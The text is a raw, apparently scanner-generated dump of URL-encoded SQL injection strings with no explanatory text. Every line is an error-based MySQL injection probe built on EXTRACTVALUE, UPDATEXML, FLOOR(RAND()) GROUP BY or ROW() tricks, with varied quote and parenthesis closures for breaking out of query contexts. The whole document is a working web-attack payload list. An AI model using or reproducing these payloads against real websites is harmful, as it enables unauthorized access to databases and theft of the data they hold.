-8131%27%29%20WHERE%206554%3D6554%20OR%20%28SELECT%207613%20FROM%28SELECT%20COUNT%28%2A%29%2CCONCAT%280x3a6762783a%2C%28SELECT%20%28CASE%20WHEN%20%287613%3D7613%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a656e623a%2CFLOOR%28RAND%280%29%2A2%29%29x%20FROM%20INFORMATION_SCHEMA.CHARACTER_SETS%20GROUP%20BY%20x%29a%29 -7863%27%20WHERE%209947%3D9947%20OR%20%28SELECT%207613%20FROM%28SELECT%20COUNT%28%2A%29%2CCONCAT%280x3a6762783a%2C%28SELECT%20%28CASE%20WHEN%20%287613%3D7613%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a656e623a%2CFLOOR%28RAND%280%29%2A2%29%29x%20FROM%20INFORMATION_SCHEMA.CHARACTER_SETS%20GROUP%20BY%20x%29a%29 -6423%22%20WHERE%209853%3D9853%20OR%20%28SELECT%207613%20FROM%28SELECT%20COUNT%28%2A%29%2CCONCAT%280x3a6762783a%2C%28SELECT%20%28CASE%20WHEN%20%287613%3D7613%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a656e623a%2CFLOOR%28RAND%280%29%2A2%29%29x%20FROM%20INFORMATION_SCHEMA.CHARACTER_SETS%20GROUP%20BY%20x%29a%29 1234.5%29%20OR%20EXTRACTVALUE%282149%2CCONCAT%280x5c%2C0x3a6762783a%2C%28SELECT%20%28CASE%20WHEN%20%282149%3D2149%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a656e623a%29%29 1234.5%27%29%20OR%20EXTRACTVALUE%282149%2CCONCAT%280x5c%2C0x3a6762783a%2C%28SELECT%20%28CASE%20WHEN%20%282149%3D2149%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a656e623a%29%29 1234.5%27%20OR%20EXTRACTVALUE%282149%2CCONCAT%280x5c%2C0x3a6762783a%2C%28SELECT%20%28CASE%20WHEN%20%282149%3D2149%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a656e623a%29%29 1234.5%22%20OR%20EXTRACTVALUE%282149%2CCONCAT%280x5c%2C0x3a6762783a%2C%28SELECT%20%28CASE%20WHEN%20%282149%3D2149%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a656e623a%29%29 1234.5%29%20OR%20EXTRACTVALUE%282149%2CCONCAT%280x5c%2C0x3a6762783a%2C%28SELECT%20%28CASE%20WHEN%20%282149%3D2149%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a656e623a%29%29%20AND%20%289733%3D9733 1234.5%29%29%20OR%20EXTRACTVALUE%282149%2CCONCAT%280x5c%2C0x3a6762783a%2C%28SELECT%20%28CASE%20WHEN%20%282149%3D2149%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a656e623a%29%29%20AND%20%28%288501%3D8501 1234.5%29%29%29%20OR%20EXTRACTVALUE%282149%2CCONCAT%280x5c%2C0x3a6762783a%2C%28SELECT%20%28CASE%20WHEN%20%282149%3D2149%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a656e623a%29%29%20AND%20%28%28%281061%3D1061 1234.5%20OR%20EXTRACTVALUE%282149%2CCONCAT%280x5c%2C0x3a6762783a%2C%28SELECT%20%28CASE%20WHEN%20%282149%3D2149%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a656e623a%29%29 1234.5%27%29%20OR%20EXTRACTVALUE%282149%2CCONCAT%280x5c%2C0x3a6762783a%2C%28SELECT%20%28CASE%20WHEN%20%282149%3D2149%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a656e623a%29%29%20AND%20%28%27HQUR%27%3D%27HQUR 1234.5%27%29%29%20OR%20EXTRACTVALUE%282149%2CCONCAT%280x5c%2C0x3a6762783a%2C%28SELECT%20%28CASE%20WHEN%20%282149%3D2149%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a656e623a%29%29%20AND%20%28%28%27SzmI%27%3D%27SzmI 1234.5%27%29%29%29%20OR%20EXTRACTVALUE%282149%2CCONCAT%280x5c%2C0x3a6762783a%2C%28SELECT%20%28CASE%20WHEN%20%282149%3D2149%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a656e623a%29%29%20AND%20%28%28%28%27eNnt%27%3D%27eNnt 1234.5%27%20OR%20EXTRACTVALUE%282149%2CCONCAT%280x5c%2C0x3a6762783a%2C%28SELECT%20%28CASE%20WHEN%20%282149%3D2149%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a656e623a%29%29%20AND%20%27ZBoR%27%3D%27ZBoR 1234.5%27%29%20OR%20EXTRACTVALUE%282149%2CCONCAT%280x5c%2C0x3a6762783a%2C%28SELECT%20%28CASE%20WHEN%20%282149%3D2149%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a656e623a%29%29%20AND%20%28%27naqp%27%20LIKE%20%27naqp 1234.5%27%29%29%20OR%20EXTRACTVALUE%282149%2CCONCAT%280x5c%2C0x3a6762783a%2C%28SELECT%20%28CASE%20WHEN%20%282149%3D2149%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a656e623a%29%29%20AND%20%28%28%27ysNl%27%20LIKE%20%27ysNl 1234.5%27%29%29%29%20OR%20EXTRACTVALUE%282149%2CCONCAT%280x5c%2C0x3a6762783a%2C%28SELECT%20%28CASE%20WHEN%20%282149%3D2149%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a656e623a%29%29%20AND%20%28%28%28%27zXMp%27%20LIKE%20%27zXMp 1234.5%27%20OR%20EXTRACTVALUE%282149%2CCONCAT%280x5c%2C0x3a6762783a%2C%28SELECT%20%28CASE%20WHEN%20%282149%3D2149%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a656e623a%29%29%20AND%20%27nUvD%27%20LIKE%20%27nUvD 1234.5%22%29%20OR%20EXTRACTVALUE%282149%2CCONCAT%280x5c%2C0x3a6762783a%2C%28SELECT%20%28CASE%20WHEN%20%282149%3D2149%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a656e623a%29%29%20AND%20%28%22tYfD%22%3D%22tYfD 1234.5%22%29%29%20OR%20EXTRACTVALUE%282149%2CCONCAT%280x5c%2C0x3a6762783a%2C%28SELECT%20%28CASE%20WHEN%20%282149%3D2149%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a656e623a%29%29%20AND%20%28%28%22OISe%22%3D%22OISe 1234.5%22%29%29%29%20OR%20EXTRACTVALUE%282149%2CCONCAT%280x5c%2C0x3a6762783a%2C%28SELECT%20%28CASE%20WHEN%20%282149%3D2149%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a656e623a%29%29%20AND%20%28%28%28%22ycPy%22%3D%22ycPy 1234.5%22%20OR%20EXTRACTVALUE%282149%2CCONCAT%280x5c%2C0x3a6762783a%2C%28SELECT%20%28CASE%20WHEN%20%282149%3D2149%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a656e623a%29%29%20AND%20%22FPfv%22%3D%22FPfv 1234.5%22%29%20OR%20EXTRACTVALUE%282149%2CCONCAT%280x5c%2C0x3a6762783a%2C%28SELECT%20%28CASE%20WHEN%20%282149%3D2149%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a656e623a%29%29%20AND%20%28%22goDg%22%20LIKE%20%22goDg 1234.5%22%29%29%20OR%20EXTRACTVALUE%282149%2CCONCAT%280x5c%2C0x3a6762783a%2C%28SELECT%20%28CASE%20WHEN%20%282149%3D2149%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a656e623a%29%29%20AND%20%28%28%22gkPJ%22%20LIKE%20%22gkPJ 1234.5%22%29%29%29%20OR%20EXTRACTVALUE%282149%2CCONCAT%280x5c%2C0x3a6762783a%2C%28SELECT%20%28CASE%20WHEN%20%282149%3D2149%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a656e623a%29%29%20AND%20%28%28%28%22wlsl%22%20LIKE%20%22wlsl 1234.5%22%20OR%20EXTRACTVALUE%282149%2CCONCAT%280x5c%2C0x3a6762783a%2C%28SELECT%20%28CASE%20WHEN%20%282149%3D2149%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a656e623a%29%29%20AND%20%22kQlT%22%20LIKE%20%22kQlT 1234.5%29%20WHERE%207545%3D7545%20OR%20EXTRACTVALUE%282149%2CCONCAT%280x5c%2C0x3a6762783a%2C%28SELECT%20%28CASE%20WHEN%20%282149%3D2149%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a656e623a%29%29 1234.5%27%29%20WHERE%208157%3D8157%20OR%20EXTRACTVALUE%282149%2CCONCAT%280x5c%2C0x3a6762783a%2C%28SELECT%20%28CASE%20WHEN%20%282149%3D2149%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a656e623a%29%29 1234.5%27%20WHERE%204072%3D4072%20OR%20EXTRACTVALUE%282149%2CCONCAT%280x5c%2C0x3a6762783a%2C%28SELECT%20%28CASE%20WHEN%20%282149%3D2149%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a656e623a%29%29 1234.5%22%20WHERE%201824%3D1824%20OR%20EXTRACTVALUE%282149%2CCONCAT%280x5c%2C0x3a6762783a%2C%28SELECT%20%28CASE%20WHEN%20%282149%3D2149%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a656e623a%29%29 1234.5%27%20%7C%7C%20%28SELECT%209436%20FROM%20DUAL%20WHERE%202499%3D2499%20OR%20EXTRACTVALUE%282149%2CCONCAT%280x5c%2C0x3a6762783a%2C%28SELECT%20%28CASE%20WHEN%20%282149%3D2149%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a656e623a%29%29%20%29%20%7C%7C%20%27 1234.5%27%20%7C%7C%20%28SELECT%201554%20WHERE%202830%3D2830%20OR%20EXTRACTVALUE%282149%2CCONCAT%280x5c%2C0x3a6762783a%2C%28SELECT%20%28CASE%20WHEN%20%282149%3D2149%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a656e623a%29%29%20%29%20%7C%7C%20%27 1234.5%20%2B%20%28SELECT%201724%20FROM%20DUAL%20WHERE%209824%3D9824%20OR%20EXTRACTVALUE%282149%2CCONCAT%280x5c%2C0x3a6762783a%2C%28SELECT%20%28CASE%20WHEN%20%282149%3D2149%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a656e623a%29%29%20%29 1234.5%20%2B%20%28SELECT%208523%20WHERE%207885%3D7885%20OR%20EXTRACTVALUE%282149%2CCONCAT%280x5c%2C0x3a6762783a%2C%28SELECT%20%28CASE%20WHEN%20%282149%3D2149%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a656e623a%29%29%20%29 1234.5%27%20%2B%20%28SELECT%20%27KhIR%27%20FROM%20DUAL%20WHERE%209059%3D9059%20OR%20EXTRACTVALUE%282149%2CCONCAT%280x5c%2C0x3a6762783a%2C%28SELECT%20%28CASE%20WHEN%20%282149%3D2149%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a656e623a%29%29%20%29%20%2B%20%27 1234.5%27%20%2B%20%28SELECT%20%27WzSo%27%20WHERE%209255%3D9255%20OR%20EXTRACTVALUE%282149%2CCONCAT%280x5c%2C0x3a6762783a%2C%28SELECT%20%28CASE%20WHEN%20%282149%3D2149%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a656e623a%29%29%20%29%20%2B%20%27 1234.5%27%20IN%20BOOLEAN%20MODE%29%20OR%20EXTRACTVALUE%282149%2CCONCAT%280x5c%2C0x3a6762783a%2C%28SELECT%20%28CASE%20WHEN%20%282149%3D2149%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a656e623a%29%29%20%23 1234.5%29%20OR%20UPDATEXML%289693%2CCONCAT%280x2e%2C0x3a6762783a%2C%28SELECT%20%28CASE%20WHEN%20%289693%3D9693%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a656e623a%29%2C8801%29 1234.5%27%29%20OR%20UPDATEXML%289693%2CCONCAT%280x2e%2C0x3a6762783a%2C%28SELECT%20%28CASE%20WHEN%20%289693%3D9693%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a656e623a%29%2C8801%29 1234.5%27%20OR%20UPDATEXML%289693%2CCONCAT%280x2e%2C0x3a6762783a%2C%28SELECT%20%28CASE%20WHEN%20%289693%3D9693%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a656e623a%29%2C8801%29 1234.5%22%20OR%20UPDATEXML%289693%2CCONCAT%280x2e%2C0x3a6762783a%2C%28SELECT%20%28CASE%20WHEN%20%289693%3D9693%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a656e623a%29%2C8801%29 1234.5%29%20OR%20UPDATEXML%289693%2CCONCAT%280x2e%2C0x3a6762783a%2C%28SELECT%20%28CASE%20WHEN%20%289693%3D9693%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a656e623a%29%2C8801%29%20AND%20%284976%3D4976 1234.5%29%29%20OR%20UPDATEXML%289693%2CCONCAT%280x2e%2C0x3a6762783a%2C%28SELECT%20%28CASE%20WHEN%20%289693%3D9693%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a656e623a%29%2C8801%29%20AND%20%28%284010%3D4010 1234.5%29%29%29%20OR%20UPDATEXML%289693%2CCONCAT%280x2e%2C0x3a6762783a%2C%28SELECT%20%28CASE%20WHEN%20%289693%3D9693%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a656e623a%29%2C8801%29%20AND%20%28%28%287695%3D7695 1234.5%20OR%20UPDATEXML%289693%2CCONCAT%280x2e%2C0x3a6762783a%2C%28SELECT%20%28CASE%20WHEN%20%289693%3D9693%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a656e623a%29%2C8801%29 1234.5%27%29%20OR%20UPDATEXML%289693%2CCONCAT%280x2e%2C0x3a6762783a%2C%28SELECT%20%28CASE%20WHEN%20%289693%3D9693%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a656e623a%29%2C8801%29%20AND%20%28%27Yopk%27%3D%27Yopk 1234.5%27%29%29%20OR%20UPDATEXML%289693%2CCONCAT%280x2e%2C0x3a6762783a%2C%28SELECT%20%28CASE%20WHEN%20%289693%3D9693%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a656e623a%29%2C8801%29%20AND%20%28%28%27tFrj%27%3D%27tFrj 1234.5%27%29%29%29%20OR%20UPDATEXML%289693%2CCONCAT%280x2e%2C0x3a6762783a%2C%28SELECT%20%28CASE%20WHEN%20%289693%3D9693%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a656e623a%29%2C8801%29%20AND%20%28%28%28%27WVeH%27%3D%27WVeH 1234.5%27%20OR%20UPDATEXML%289693%2CCONCAT%280x2e%2C0x3a6762783a%2C%28SELECT%20%28CASE%20WHEN%20%289693%3D9693%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a656e623a%29%2C8801%29%20AND%20%27NLTc%27%3D%27NLTc 1234.5%27%29%20OR%20UPDATEXML%289693%2CCONCAT%280x2e%2C0x3a6762783a%2C%28SELECT%20%28CASE%20WHEN%20%289693%3D9693%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a656e623a%29%2C8801%29%20AND%20%28%27WtlZ%27%20LIKE%20%27WtlZ 1234.5%27%29%29%20OR%20UPDATEXML%289693%2CCONCAT%280x2e%2C0x3a6762783a%2C%28SELECT%20%28CASE%20WHEN%20%289693%3D9693%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a656e623a%29%2C8801%29%20AND%20%28%28%27mAbn%27%20LIKE%20%27mAbn 1234.5%27%29%29%29%20OR%20UPDATEXML%289693%2CCONCAT%280x2e%2C0x3a6762783a%2C%28SELECT%20%28CASE%20WHEN%20%289693%3D9693%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a656e623a%29%2C8801%29%20AND%20%28%28%28%27oUdf%27%20LIKE%20%27oUdf 1234.5%27%20OR%20UPDATEXML%289693%2CCONCAT%280x2e%2C0x3a6762783a%2C%28SELECT%20%28CASE%20WHEN%20%289693%3D9693%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a656e623a%29%2C8801%29%20AND%20%27pheR%27%20LIKE%20%27pheR 1234.5%22%29%20OR%20UPDATEXML%289693%2CCONCAT%280x2e%2C0x3a6762783a%2C%28SELECT%20%28CASE%20WHEN%20%289693%3D9693%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a656e623a%29%2C8801%29%20AND%20%28%22EqTc%22%3D%22EqTc 1234.5%22%29%29%20OR%20UPDATEXML%289693%2CCONCAT%280x2e%2C0x3a6762783a%2C%28SELECT%20%28CASE%20WHEN%20%289693%3D9693%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a656e623a%29%2C8801%29%20AND%20%28%28%22EvxF%22%3D%22EvxF 1234.5%22%29%29%29%20OR%20UPDATEXML%289693%2CCONCAT%280x2e%2C0x3a6762783a%2C%28SELECT%20%28CASE%20WHEN%20%289693%3D9693%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a656e623a%29%2C8801%29%20AND%20%28%28%28%22feaf%22%3D%22feaf 1234.5%22%20OR%20UPDATEXML%289693%2CCONCAT%280x2e%2C0x3a6762783a%2C%28SELECT%20%28CASE%20WHEN%20%289693%3D9693%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a656e623a%29%2C8801%29%20AND%20%22yQzf%22%3D%22yQzf 1234.5%22%29%20OR%20UPDATEXML%289693%2CCONCAT%280x2e%2C0x3a6762783a%2C%28SELECT%20%28CASE%20WHEN%20%289693%3D9693%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a656e623a%29%2C8801%29%20AND%20%28%22RFSq%22%20LIKE%20%22RFSq 1234.5%22%29%29%20OR%20UPDATEXML%289693%2CCONCAT%280x2e%2C0x3a6762783a%2C%28SELECT%20%28CASE%20WHEN%20%289693%3D9693%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a656e623a%29%2C8801%29%20AND%20%28%28%22pzcB%22%20LIKE%20%22pzcB 1234.5%22%29%29%29%20OR%20UPDATEXML%289693%2CCONCAT%280x2e%2C0x3a6762783a%2C%28SELECT%20%28CASE%20WHEN%20%289693%3D9693%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a656e623a%29%2C8801%29%20AND%20%28%28%28%22EVFp%22%20LIKE%20%22EVFp 1234.5%22%20OR%20UPDATEXML%289693%2CCONCAT%280x2e%2C0x3a6762783a%2C%28SELECT%20%28CASE%20WHEN%20%289693%3D9693%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a656e623a%29%2C8801%29%20AND%20%22gEth%22%20LIKE%20%22gEth 1234.5%29%20WHERE%204056%3D4056%20OR%20UPDATEXML%289693%2CCONCAT%280x2e%2C0x3a6762783a%2C%28SELECT%20%28CASE%20WHEN%20%289693%3D9693%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a656e623a%29%2C8801%29 1234.5%27%29%20WHERE%209625%3D9625%20OR%20UPDATEXML%289693%2CCONCAT%280x2e%2C0x3a6762783a%2C%28SELECT%20%28CASE%20WHEN%20%289693%3D9693%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a656e623a%29%2C8801%29 1234.5%27%20WHERE%208570%3D8570%20OR%20UPDATEXML%289693%2CCONCAT%280x2e%2C0x3a6762783a%2C%28SELECT%20%28CASE%20WHEN%20%289693%3D9693%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a656e623a%29%2C8801%29 1234.5%22%20WHERE%208242%3D8242%20OR%20UPDATEXML%289693%2CCONCAT%280x2e%2C0x3a6762783a%2C%28SELECT%20%28CASE%20WHEN%20%289693%3D9693%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a656e623a%29%2C8801%29 1234.5%27%20%7C%7C%20%28SELECT%209963%20FROM%20DUAL%20WHERE%203373%3D3373%20OR%20UPDATEXML%289693%2CCONCAT%280x2e%2C0x3a6762783a%2C%28SELECT%20%28CASE%20WHEN%20%289693%3D9693%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a656e623a%29%2C8801%29%20%29%20%7C%7C%20%27 1234.5%27%20%7C%7C%20%28SELECT%205968%20WHERE%202498%3D2498%20OR%20UPDATEXML%289693%2CCONCAT%280x2e%2C0x3a6762783a%2C%28SELECT%20%28CASE%20WHEN%20%289693%3D9693%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a656e623a%29%2C8801%29%20%29%20%7C%7C%20%27 1234.5%20%2B%20%28SELECT%209670%20FROM%20DUAL%20WHERE%202994%3D2994%20OR%20UPDATEXML%289693%2CCONCAT%280x2e%2C0x3a6762783a%2C%28SELECT%20%28CASE%20WHEN%20%289693%3D9693%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a656e623a%29%2C8801%29%20%29 1234.5%20%2B%20%28SELECT%203447%20WHERE%206831%3D6831%20OR%20UPDATEXML%289693%2CCONCAT%280x2e%2C0x3a6762783a%2C%28SELECT%20%28CASE%20WHEN%20%289693%3D9693%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a656e623a%29%2C8801%29%20%29 1234.5%27%20%2B%20%28SELECT%20%27jZXu%27%20FROM%20DUAL%20WHERE%208129%3D8129%20OR%20UPDATEXML%289693%2CCONCAT%280x2e%2C0x3a6762783a%2C%28SELECT%20%28CASE%20WHEN%20%289693%3D9693%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a656e623a%29%2C8801%29%20%29%20%2B%20%27 1234.5%27%20%2B%20%28SELECT%20%27qRWV%27%20WHERE%209528%3D9528%20OR%20UPDATEXML%289693%2CCONCAT%280x2e%2C0x3a6762783a%2C%28SELECT%20%28CASE%20WHEN%20%289693%3D9693%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a656e623a%29%2C8801%29%20%29%20%2B%20%27 1234.5%27%20IN%20BOOLEAN%20MODE%29%20OR%20UPDATEXML%289693%2CCONCAT%280x2e%2C0x3a6762783a%2C%28SELECT%20%28CASE%20WHEN%20%289693%3D9693%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a656e623a%29%2C8801%29%20%23 -2181%29%20OR%20ROW%282987%2C1920%29%3E%28SELECT%20COUNT%28%2A%29%2CCONCAT%280x3a6762783a%2C%28SELECT%20%28CASE%20WHEN%20%282987%3D2987%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a656e623a%2CFLOOR%28RAND%280%29%2A2%29%29x%20FROM%20%28SELECT%202987%20UNION%20SELECT%201920%29a%20GROUP%20BY%20x%20LIMIT%201%29 -2627%27%29%20OR%20ROW%282987%2C1920%29%3E%28SELECT%20COUNT%28%2A%29%2CCONCAT%280x3a6762783a%2C%28SELECT%20%28CASE%20WHEN%20%282987%3D2987%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a656e623a%2CFLOOR%28RAND%280%29%2A2%29%29x%20FROM%20%28SELECT%202987%20UNION%20SELECT%201920%29a%20GROUP%20BY%20x%20LIMIT%201%29 -6356%27%20OR%20ROW%282987%2C1920%29%3E%28SELECT%20COUNT%28%2A%29%2CCONCAT%280x3a6762783a%2C%28SELECT%20%28CASE%20WHEN%20%282987%3D2987%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a656e623a%2CFLOOR%28RAND%280%29%2A2%29%29x%20FROM%20%28SELECT%202987%20UNION%20SELECT%201920%29a%20GROUP%20BY%20x%20LIMIT%201%29 -2324%22%20OR%20ROW%282987%2C1920%29%3E%28SELECT%20COUNT%28%2A%29%2CCONCAT%280x3a6762783a%2C%28SELECT%20%28CASE%20WHEN%20%282987%3D2987%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a656e623a%2CFLOOR%28RAND%280%29%2A2%29%29x%20FROM%20%28SELECT%202987%20UNION%20SELECT%201920%29a%20GROUP%20BY%20x%20LIMIT%201%29 -2150%29%20OR%20ROW%282987%2C1920%29%3E%28SELECT%20COUNT%28%2A%29%2CCONCAT%280x3a6762783a%2C%28SELECT%20%28CASE%20WHEN%20%282987%3D2987%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a656e623a%2CFLOOR%28RAND%280%29%2A2%29%29x%20FROM%20%28SELECT%202987%20UNION%20SELECT%201920%29a%20GROUP%20BY%20x%20LIMIT%201%29%20AND%20%282477%3D2477 -2962%29%29%20OR%20ROW%282987%2C1920%29%3E%28SELECT%20COUNT%28%2A%29%2CCONCAT%280x3a6762783a%2C%28SELECT%20%28CASE%20WHEN%20%282987%3D2987%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a656e623a%2CFLOOR%28RAND%280%29%2A2%29%29x%20FROM%20%28SELECT%202987%20UNION%20SELECT%201920%29a%20GROUP%20BY%20x%20LIMIT%201%29%20AND%20%28%283544%3D3544 -9754%29%29%29%20OR%20ROW%282987%2C1920%29%3E%28SELECT%20COUNT%28%2A%29%2CCONCAT%280x3a6762783a%2C%28SELECT%20%28CASE%20WHEN%20%282987%3D2987%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a656e623a%2CFLOOR%28RAND%280%29%2A2%29%29x%20FROM%20%28SELECT%202987%20UNION%20SELECT%201920%29a%20GROUP%20BY%20x%20LIMIT%201%29%20AND%20%28%28%288366%3D8366 -3644%20OR%20ROW%282987%2C1920%29%3E%28SELECT%20COUNT%28%2A%29%2CCONCAT%280x3a6762783a%2C%28SELECT%20%28CASE%20WHEN%20%282987%3D2987%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a656e623a%2CFLOOR%28RAND%280%29%2A2%29%29x%20FROM%20%28SELECT%202987%20UNION%20SELECT%201920%29a%20GROUP%20BY%20x%20LIMIT%201%29 -2647%27%29%20OR%20ROW%282987%2C1920%29%3E%28SELECT%20COUNT%28%2A%29%2CCONCAT%280x3a6762783a%2C%28SELECT%20%28CASE%20WHEN%20%282987%3D2987%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a656e623a%2CFLOOR%28RAND%280%29%2A2%29%29x%20FROM%20%28SELECT%202987%20UNION%20SELECT%201920%29a%20GROUP%20BY%20x%20LIMIT%201%29%20AND%20%28%27oRzr%27%3D%27oRzr -4469%27%29%29%20OR%20ROW%282987%2C1920%29%3E%28SELECT%20COUNT%28%2A%29%2CCONCAT%280x3a6762783a%2C%28SELECT%20%28CASE%20WHEN%20%282987%3D2987%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a656e623a%2CFLOOR%28RAND%280%29%2A2%29%29x%20FROM%20%28SELECT%202987%20UNION%20SELECT%201920%29a%20GROUP%20BY%20x%20LIMIT%201%29%20AND%20%28%28%27tIdW%27%3D%27tIdW -1226%27%29%29%29%20OR%20ROW%282987%2C1920%29%3E%28SELECT%20COUNT%28%2A%29%2CCONCAT%280x3a6762783a%2C%28SELECT%20%28CASE%20WHEN%20%282987%3D2987%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a656e623a%2CFLOOR%28RAND%280%29%2A2%29%29x%20FROM%20%28SELECT%202987%20UNION%20SELECT%201920%29a%20GROUP%20BY%20x%20LIMIT%201%29%20AND%20%28%28%28%27ybYc%27%3D%27ybYc -1787%27%20OR%20ROW%282987%2C1920%29%3E%28SELECT%20COUNT%28%2A%29%2CCONCAT%280x3a6762783a%2C%28SELECT%20%28CASE%20WHEN%20%282987%3D2987%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a656e623a%2CFLOOR%28RAND%280%29%2A2%29%29x%20FROM%20%28SELECT%202987%20UNION%20SELECT%201920%29a%20GROUP%20BY%20x%20LIMIT%201%29%20AND%20%27vBoq%27%3D%27vBoq -2128%27%29%20OR%20ROW%282987%2C1920%29%3E%28SELECT%20COUNT%28%2A%29%2CCONCAT%280x3a6762783a%2C%28SELECT%20%28CASE%20WHEN%20%282987%3D2987%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a656e623a%2CFLOOR%28RAND%280%29%2A2%29%29x%20FROM%20%28SELECT%202987%20UNION%20SELECT%201920%29a%20GROUP%20BY%20x%20LIMIT%201%29%20AND%20%28%27wnIJ%27%20LIKE%20%27wnIJ -9680%27%29%29%20OR%20ROW%282987%2C1920%29%3E%28SELECT%20COUNT%28%2A%29%2CCONCAT%280x3a6762783a%2C%28SELECT%20%28CASE%20WHEN%20%282987%3D2987%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a656e623a%2CFLOOR%28RAND%280%29%2A2%29%29x%20FROM%20%28SELECT%202987%20UNION%20SELECT%201920%29a%20GROUP%20BY%20x%20LIMIT%201%29%20AND%20%28%28%27NlDA%27%20LIKE%20%27NlDA -2103%27%29%29%29%20OR%20ROW%282987%2C1920%29%3E%28SELECT%20COUNT%28%2A%29%2CCONCAT%280x3a6762783a%2C%28SELECT%20%28CASE%20WHEN%20%282987%3D2987%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a656e623a%2CFLOOR%28RAND%280%29%2A2%29%29x%20FROM%20%28SELECT%202987%20UNION%20SELECT%201920%29a%20GROUP%20BY%20x%20LIMIT%201%29%20AND%20%28%28%28%27xxRk%27%20LIKE%20%27xxRk -2424%27%20OR%20ROW%282987%2C1920%29%3E%28SELECT%20COUNT%28%2A%29%2CCONCAT%280x3a6762783a%2C%28SELECT%20%28CASE%20WHEN%20%282987%3D2987%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a656e623a%2CFLOOR%28RAND%280%29%2A2%29%29x%20FROM%20%28SELECT%202987%20UNION%20SELECT%201920%29a%20GROUP%20BY%20x%20LIMIT%201%29%20AND%20%27GXit%27%20LIKE%20%27GXit 